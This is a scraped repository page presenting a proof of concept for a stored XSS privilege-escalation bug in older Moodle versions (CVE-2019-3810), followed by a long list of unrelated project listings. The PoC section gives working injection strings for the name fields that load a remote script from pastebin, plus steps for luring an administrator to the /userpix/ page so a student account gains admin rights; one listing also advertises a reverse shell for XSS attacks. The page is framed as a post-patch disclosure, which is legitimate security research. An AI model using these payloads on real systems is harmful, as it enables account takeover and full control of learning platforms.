Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC for Privilege Escalation (Student to Admin)

Overview

Moodle CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC for Privilege Escalation (Student to Admin). This is one of the past bugs that I discovered during past pentest in an academic institution. It was successful enough at the time to practically steal admin access and gain complete control over Moodle using just one simple bug.

We can see from the git history, the bug existed since old versions of Moodle (2003) and just patched in 2019.

Timeline:

  • December 2018 - Reported the bug to Moodle
  • January 2019 - Patch released
  • April 2021 - PoC disclosure

WARNING

FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THE EXPLOIT FOR ILLEGAL ACTIVITIES. THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.

PoC

  1. Upload the payload.js to pastebin or other similar service. Change the value of userid to your own id. Let's say the URL is https://pastebin.com/raw/xxxxxxxx.
  2. Login to your student account.
  3. Set first name with " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
  4. Set surname with ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
  5. Ask the administrator to open /userpix/ page or put the link to that page on your post and wait.

If successful, your account will be added as administrator.

Demonstration video

You might also like...

DOMPurify - a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks. Demo:

DOMPurify - a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks. Demo:

DOMPurify DOMPurify is a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. It's also very simple to use and get started with

Jan 7, 2023

Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist

Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist

Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist. xss is a module used to filter input from users to prevent XSS

Jan 2, 2023

Secure XSS Filters.

Secure XSS Filters.

Secure XSS Filters Just sufficient output filtering to prevent XSS! Goals More Secure. Context-dependent output filters that are developer-friendly. I

Jan 9, 2023

A cyber-sec tool to be used responsibly in identifying XSS vulnerabilities

A cyber-sec tool to be used responsibly in identifying XSS vulnerabilities

Visit the Breach website here Table of Contents About Breach Getting Started Demo Scan URL Results History Settings Looking Ahead Contributors License

Apr 14, 2022

A websocket-based reverse shell for XSS attacks.

A websocket-based reverse shell for XSS attacks.

CrossSiteShell A javascript/nodejs "reverse shell" that makes it easier to interact with the victim's browser during XSS attacks. Usage Run the follow

Oct 7, 2022

A tool to develop and improve a student’s programming skills by introducing the earliest lessons of coding.

A tool to develop and improve a student’s programming skills by introducing the earliest lessons of coding.

teachcode A tool to develop and improve a student’s programming skills by introducing the earliest lessons of coding. Chat: Telegram Donate: PayPal, P

Oct 25, 2022

A web-based application for student-tutor matching service

A web-based application for student-tutor matching service

CodeX A web-based application for student-tutor matching service This project was generated using Nx. 🔎 Smart, Fast and Extensible Build System Addin

Jan 25, 2022

A simple leaderboard project made while a student in Microverse using API to get scores for a game, JavaScript, HTML and basic CSS

A simple leaderboard project made while a student in Microverse using API to get scores for a game, JavaScript, HTML and basic CSS

Nov 28, 2022

A simple to-do list created while a student in Microverse using JavaScript to add and delete selected tasks.

A simple to-do list created while a student in Microverse using JavaScript to add and delete selected tasks.

To-Do List This is a simple To-Do list page I made following the requirements from Microverse. You can check it out here: https://thi-ponce.github.io/

Nov 28, 2022

Personal project to a student schedule classes according his course level. Using GraphQL, Clean Code e Clean Architecture.

Personal project to a student schedule classes according his course level. Using GraphQL, Clean Code e Clean Architecture.

classes-scheduler-graphql This is a personal project for student scheduling, with classes according his course level. I intend to make just the backen

Jul 9, 2022

The new website for Microsoft Learn Student Chapter,TIET

Guidelines Steps for Contribution Fork this repository and clone it on your local machine. Use npm i to install all the dependencies. The folders for

Oct 6, 2022

A decentralised portal that aims to help Government Educational organisations to track student and colleges data to provide them with fellowships and programs.

A decentralised portal that aims to help Government Educational organisations to track student and colleges data to provide them with fellowships and programs.

DeSIDB A decentralised database built on Ethereum & Solidity. Introduction - India is a country with a population of 6.8 crore students graduating eac

Jul 10, 2022

Student reviews for OMS courses. Built with NextJS and Typescript. Backed by Sanity CMS. Deployed on Vercel.

This is a Next.js project bootstrapped with create-next-app. Getting Started First, run the development server: npm run dev # or yarn dev Open http://

Dec 3, 2022

A project to showcase a poc of distributed systems with message queue, graphql, grpc, http server with added monitoring and tracing capabilities.

A project to showcase a poc of distributed systems with message queue, graphql, grpc, http server with added monitoring and tracing capabilities.

trace-sandbox Trace sandbox is a project to showcase a poc of distributed systems with message queue, graphql, grpc, http server with added monitoring

Jun 24, 2021

A POC of a Discord.js bot that sends 3D rendering instructions to a Go server through gRPC which responds with the image bytes which are then sent back on Discord.

A POC of a Discord.js bot that sends 3D rendering instructions to a Go server through gRPC which responds with the image bytes which are then sent back on Discord.

Jan 8, 2022

POC implementation of liveblocks.io obsidian plugin

Obsidian Liveblocks by shabegom A POC implementation of liveblocks.io inside an obsidian plugin. Install Create an account at https://liveblocks.io Gr

Oct 7, 2022

This repository aims to create a POC about authentication and authorization using NestJS, Prisma and JWT.

A progressive Node.js framework for building efficient and scalable server-side applications. Description Nest framework TypeScript starter repository

Nov 2, 2022

Embeddable 3D Rendering Engine with JS, a POC project.

Embeddable 3D Rendering Engine with JS, a POC project.

Three.V8 Three.V8 is a proof of concept (POC) of an embedabble 3D rendering engine using JavaScript as user script. Currently, the whole project requi

Nov 29, 2022

Minimal framework for SSG (WIP, PoC)

Frostleaf https://zenn.dev/0918nobita/scraps/64a268583b8463 Development Install tools asdf plugin-add nodejs asdf plugin-add pnpm asdf install Install

Jun 4, 2022
Owner
Fariskhi Vidyan
Computer & information security 🐱🐺 | IDN & SG
Fariskhi Vidyan
A student-made, student-tailored Firefox add-on for Veracross. Provides ease of navigation in Veracross, among with other quality of life features. More features in progress.

Check out the Chrome version! This release is version 1.0.0, so the only feature it has is clickable links to the dropbox from the classpage. Any comm

Webb School CS Club 3 Nov 25, 2022
基于vue3.0-ts-Element集成的简洁/实用后台模板!《带预览地址》vue-admin;vue+admin;vue-element;vue+element;vue后台管理;vue3.0-admin;vue3.0-element。

一、基于vue3.0+ts+Element通用后台admin模板 二、在线预览地址:http://admin.yknba.cn/ 三、下载使用: 1、克隆代码 通过git将代码克隆到本地;或者使用下载安装包模式进行下载。 2、进入目录 进入项目的根目录:vue3.0-ts-admin 3、安装依

null 64 Dec 16, 2022
Grupprojekt för kurserna 'Javascript med Ramverk' och 'Agil Utveckling'

JavaScript-med-Ramverk-Laboration-3 Grupprojektet för kurserna Javascript med Ramverk och Agil Utveckling. Utvecklingsguide För information om hur utv

Svante Jonsson IT-Högskolan 3 May 18, 2022
Hemsida för personer i Sverige som kan och vill erbjuda boende till människor på flykt

Getting Started with Create React App This project was bootstrapped with Create React App. Available Scripts In the project directory, you can run: np

null 4 May 3, 2022
Kurs-repo för kursen Webbserver och Databaser

Webbserver och databaser This repository is meant for CME students to access exercises and codealongs that happen throughout the course. I hope you wi

null 14 Jan 3, 2023
Source of the (Un)official Moodle Developer Resources

Moodle Developer Resources Introduction This repository includes the source for the Moodle Developer Resources - a collection of resources aimed at ma

Moodle Development 19 Dec 16, 2022
Download all Moodle files with one click. This is a Chrome extension built to save time and effort from downloading files manually one by one!

Moodle Downloader Extension Moodle downloader extension for Chrome. The extension is tested with both the TUM moodle and the official moodle demo. Not

Zhongpin Wang 8 Nov 15, 2022
:tada: A magical vue admin https://panjiachen.github.io/vue-element-admin

English | 简体中文 | 日本語 | Spanish SPONSORED BY 活动服务销售平台 客户消息直达工作群 Introduction vue-element-admin is a production-ready front-end solution for admin inter

花裤衩 80.1k Dec 31, 2022
🎉 基于 reactjs 开发的可视化项目实战【https://wuli-admin.gitee.io/react-wuli-admin/#/workspace/fullscreen】

react-visual-data 介绍 ?? 基于 reactjs 开发的可视化项目实战 亮点 大屏设计器:自由拖拽大屏 报表设计器:自适应排列布局 动态表单:schema 设计模式 vue版本尝鲜:vue版本尝鲜 issues,欢迎提交~ 调试 > git clone https://githu

Aaron,chen 93 Dec 13, 2022
Admin UI Template is a modern, responsive, and customizable admin UI template for your business.

Admin UI Template is a modern, responsive, and customizable admin UI template for your business. It contains reusable components, theme color, and design support along with dark theme support.

Open Template Hub 7 Dec 18, 2022